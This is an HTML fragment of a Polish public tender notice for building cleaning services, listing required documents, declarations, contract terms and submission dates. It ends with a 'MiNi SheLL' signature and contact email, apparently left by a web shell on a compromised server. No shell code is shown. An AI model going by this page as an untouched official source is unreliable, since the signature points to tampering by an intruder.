z 2019 r. poz.<br/>1170). Wzór oświadczenia zostanie przekazany Wykonawcy wraz z wezwaniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>i. dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia.<br/>ii. Wykaz usług wykonanych lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie,<br/>potwierdzających, że Wykonawca wykonał lub wykonuje co najmniej: 2 usługi, z których każda usługa obejmuje usługi polegające na sprzątaniu w budynkach użyteczności publicznej o powierzchni<br/>sprzątania min. 1 000 m2 wraz z usługami mycia okien, wykonywanych w sposób ciągły przez okres co<br/>najmniej 12 miesięcy każda, o wartości umowy:<br/>2. dla Zadania 1 A i B - nie mniejszej niż 250 000,00 złotych.<br/>3. dla Zadania 2 A, B i C – nie mniejszej niż 100.000,00 złotych<br/>W przypadku usług trwających wymaga się, aby dotychczas zrealizowane usługi wypełniały powyższe<br/>warunki (powierzchnię, okres trwania oraz wartość usługi już zrealizowanej),<br/>Wraz z wykazem, Wykonawca przedłoży dowody określające, czy te usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, lub są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów - oświadczenie wykonawcy; w przypadku świadczeń nadal wykonywanych referencje<br/>bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy – wzór wykazu usług zostanie przesłany wraz z wezwaniem.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta i dokumenty składane wraz z ofertą:<br/>a) Formularz ofertowy - sporządzony z wykorzystaniem wzoru stanowiącego załącznik nr 1 do<br/>SWZ.<br/>b) Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu -<br/>zgodnie ze wzorem stanowiącym załącznik nr 2 i 3 do SWZ. Informacje zawarte w oświadczeniu<br/>stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki<br/>udziału w postepowaniu.<br/>c) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, składa każdy z<br/>wykonawców. W przypadku polegania na zasobach podmiotu<br/>trzeciego (zgodnie z art. 118 uPzp) Wykonawca przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na<br/>jego zasoby,<br/>d) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z<br/>art. 117 ust. 3 ustawy Pzp, z którego musi wynikać, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni Wykonawcy <br/>e) Odpis lub Informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowania do reprezentowania, chyba że zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca<br/>wskazał dane umożliwiające dostęp do tych dokumentów.<br/>f) pełnomocnictwo - w przypadku gdy oferta nie została podpisana przez osobę uprawnioną do<br/>reprezentacji Wykonawcy określoną w odpowiednim rejestrze lub innym dokumencie właściwym<br/>dla danej formy organizacyjnej Wykonawcy. Pełnomocnictwo musi być złożone w postaci<br/>elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub<br/>podpisem osobistym. W przypadku pełnomocnictwa sporządzonego jako dokument w postaci<br/>papierowej przekazuje się cyfrowe odwzorowanie tego dokumentu (skan) poświadczone za<br/>zgodność cyfrowego odwzorowania z oryginałem. Poświadczenia zgodności dokonuje<br/>mocodawca lub notariusz.;<br/>g) W przypadku wykonawców wspólnie ubiegających się o zamówienie należy złożyć<br/>pełnomocnictwo do reprezentowania ich w postępowaniu (forma pełnomocnictwa – zgodnie z lit.<br/>f powyżej);<br/>Jeżeli któryś z wymaganych dokumentów składanych przez Wykonawcę jest sporządzony<br/>języku obcym, dokument taki należy złożyć wraz z tłumaczeniem na język polski.<br/>Jeżeli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r o zwalczaniu nieuczciwej konkurencji, Wykonawca, w celu zachowania poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/>Podczas dodawania załączników do oferty Wykonawca ma możliwość ustawienia ich jako jawne<br/>lub niejawne. W razie jednoczesnego wystąpienia w danym dokumencie lub oświadczeniu treści<br/>o charakterze jawnym i niejawnym, należy podzielić ten plik na dwa pliki i każdy z nich<br/>odpowiednio oznaczyć. Odpowiednie oznaczenie zastrzeżonej treści oferty spoczywa na<br/>Wykonawcy. Wykonawca wraz z przekazaniem informacji o zastrzeżeniu tajemnicy przedsiębiorstwa, zobowiązany jest wykazać, iż zastrzeżone informacje stanowią tajemnicę<br/>przedsiębiorstwa, pod rygorem ich normalnego ujawniania. Jawną część uzasadnienia<br/>zastrzeżenia tajemnicy przedsiębiorstwa należy złożyć w odrębnym pliku. W sytuacji, gdy<br/>Wykonawca zastrzeże w ofercie informacje, które nie stanowią tajemnicy przedsiębiorstwa lub<br/>są jawne na podstawie przepisów ustawy lub odrębnych przepisów, informacje te będą<br/>podlegały udostępnieniu na takich samych zasadach, jak pozostałe niezastrzeżone informacje.<br/>Powyższe regulacje znajdują odpowiednie zastosowanie, w przypadku zastrzeżenia informacji<br/>stanowiących tajemnicę przedsiębiorstwa na późniejszym etapie postępowania, w stosunku do<br/>oświadczeń i dokumentów składanych po otwarciu ofert. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, składa każdy z<br/>wykonawców. Oświadczenia te mają potwierdzać brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu; 2. oświadczenie Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, zgodnie z art. 117 ust. 3 ustawy Pzp, z którego musi<br/>wynikać, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy -<br/>sporządzone z wykorzystaniem wzoru stanowiącego z załącznik nr 5 do SWZ. 3. W przypadku<br/>wykonawców wspólnie ubiegających się o zamówienie należy złożyć pełnomocnictwo do<br/>reprezentowania ich w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz we wskazanym wzorze umowy, stanowiącym załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert odbywa się za pomocą środków komunikacji elekronicznej pod adresem https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-03 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com